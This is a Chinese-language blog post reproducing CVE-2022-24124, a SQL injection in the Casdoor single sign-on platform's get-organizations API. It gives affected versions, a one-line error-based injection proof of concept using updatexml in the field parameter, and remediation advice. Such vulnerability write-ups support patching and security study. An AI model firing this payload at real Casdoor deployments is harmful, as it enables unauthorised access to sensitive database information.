Casdoor get-organizations SQL注入漏洞 CVE-2022-24124

最新推荐文章于 2024-04-02 14:50:16 发布
最新推荐文章于 2024-04-02 14:50:16 发布
阅读量993 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: sql 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46801402/article/details/127646539
版权

漏洞描述:

Casdoor 是一个基于 OAuth 2.0 / OIDC 的中心化的单点登录(SSO)身份验证平台,简单来说,就是 Casdoor可以帮你解决用户管理的难题,你无需开发用户登录、注册等与用户鉴权相关的一系列功能,只需几个步骤进行简单配置,与你的主应用配合,便可完全托管你的用户模块,简单省心,功能强大。Casdoor目前作为 Casbin 社区项目统一使用的鉴权平台,并且项目已开源。

漏洞利用条件:

在查询API 存在与字段和值参数相关的SQL 注入漏洞,未经授权的攻击者可以利用该漏洞获取数据库敏感信息。如api/get-organizations

漏洞影响范围:

Casdoor < Casdoor 1.13.1

漏洞复现:

poc:

/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)

 

 

修复建议:

1、升级官方最新安全版本。

2、加强对用户输入信息进行验证和过滤,在具体检查输入或提交的变量时,对于括号、冒号等危险字符进行转换或者过滤。

想要暴富的小林子
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Casdoor SQL注入漏洞复现,编号:CVE-2022-24124
╲ゞ紅桃K
08-31 2379
漏洞属于Sql注入漏洞,在查询API 存在与字段和值参数相关的SQL 注入漏洞,如api/get-organizations 所示。
春秋云境:CVE-2022-24124Casdoor api get-oraganizations SQL注入
m0_65712192的博客
07-23 884
Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。
漏洞复现】Casdoor-任意文件读取
2301_80115097的博客
04-02 270
Casdoor系统static存在任意文件读取漏洞漏洞描述】Casdoor是一个基于OAuth 2.0、OIDC、SAML 和 CAS 的,UI-first的身份和访问管理(IAM)/单点登录(SSO)平台。使用 Go 和react开发,前后端分离,内置第三方应用登录服务。
春秋云境:CVE-2022-24124
一只爱吃橙子的羊
12-02 2349
Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。
CVE-2022-24124复现
giaogiaogioao的博客
11-26 727
CVE-2022-24124复现
【春秋云境】CVE-2022-24124复现
小高工作室
12-01 1078
【代码】【春秋云境】CVE-2022-24124复现。
django-organizations:Django项目的多用户帐户
02-05
django-organizations:Django项目的多用户帐户
Exam Ref 70-761 Querying Data with Transact-SQL
04-12
Exam Ref 70-761 Querying Data with Transact-SQL by Itzik Ben-Gan English | 4 Apr. 2017 | ASIN: B06Y21QGGQ | 352 Pages | AZW3 | 23.79 MB Prepare for Microsoft Exam 70-761–and help demonstrate your ...
organizations-infra:贤者AWS组织
03-13
光盘组织运行'npm install' 运行npx org-formation process-tasks --profile master-profile --verbose --print-stack organization-tasks.yaml 注意:master-profile是可以承担该帐户的organizations-admin角色的...
gsoc-organizations:一个用于查看和分析参加Google Summer of Code的组织的信息的网站
05-06
GSoC组织 一个用于查看和分析参加的组织的信息,并根据各种因素(例如参与年限,类别等)对它们进行过滤的网站。 科技栈 -Gatsby是用于开发此站点的前端框架。 -Redoc用于生成api文档。 :dizzy: 部署状态 ...
aws-java-sdk-organizations-1.11.106.jar
最新发布
05-24
javaweb/javaee 常用jar包,亲测可用,若需其他版本其他jar包请留言我看到后会上传分享
漏洞复现】Django SQL注入漏洞 (CVE-2022-28346)
做自己喜欢的事,并将其发挥到极致!
01-01 3984
Django是用Python开发的一个免费开源的Web结构,几乎包括了Web使用方方面面,能够用于快速建立高性能、文雅的网站,Diango提供了许多网站后台开发常常用到的模块,使开发者可以专注于业务部分。攻击者使用精心编制的字典,通过 **kwargs 传递给QuerySet.annotate()、aggregate()和extra()这些方法,可导致这些方法在列别名中受到SQL注入攻击,该漏洞在2.2.28之前的Django 2.2、3.2.13之前的3.2和4.0.4之前的4.0中都存在这个问题。
【春秋云镜】CVE-2022-24124 Casdoor api get-oraganizations SQL注入漏洞 解题思路
Dark-Specter的博客
12-19 911
报错注入的原理是利用应用程序在处理用户输入时存在漏洞,攻击者通过巧妙构造的恶意输入,触发应用程序执行包含SQL查询的操作,并故意引发数据库系统的错误,以从错误消息中获取敏感信息。:应用程序通常允许用户在表单字段、URL参数或其他输入方式中提供数据,这些数据将用于构建SQL查询。如果应用程序未正确验证和处理用户输入,就有可能存在漏洞。:攻击者利用这个漏洞,构造恶意输入,将恶意SQL代码插入到用户输入中,这个恶意SQL代码将成为应用程序生成的SQL查询的一部分。:攻击者的恶意输入旨在触发SQL查询中的错误。
春秋云境:CVE-2022-32991(SQL注入
m0_65712192的博客
04-12 1563
该CMS的welcome.php中存在SQL注入攻击。
Victor CMS SQL注入漏洞(CVE-2022-28060)
千寻的博客
11-28 1515
Victor CMS v1.0 /includes/login.php 存在sql注入
春秋云境:CVE-2022-28060(SQL注入
m0_65712192的博客
04-20 762
Victor CMS v1.0 /includes/login.php 存在sql注入
处理casdoor明文传输高危漏洞遇到的问题整理
weixin_55751581的博客
07-05 924
casdoor处理明文传输问题整理
Victor CMS SQL注入漏洞CVE-2022-26201)
千寻的博客
12-01 1819
Victor CMS v1.0 存在二次注入漏洞
externally-managed-environment
05-26
In this type of environment, organizations do not have to worry about the maintenance and management of physical hardware, software, and other resources, but they rely on a service provider to handle...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值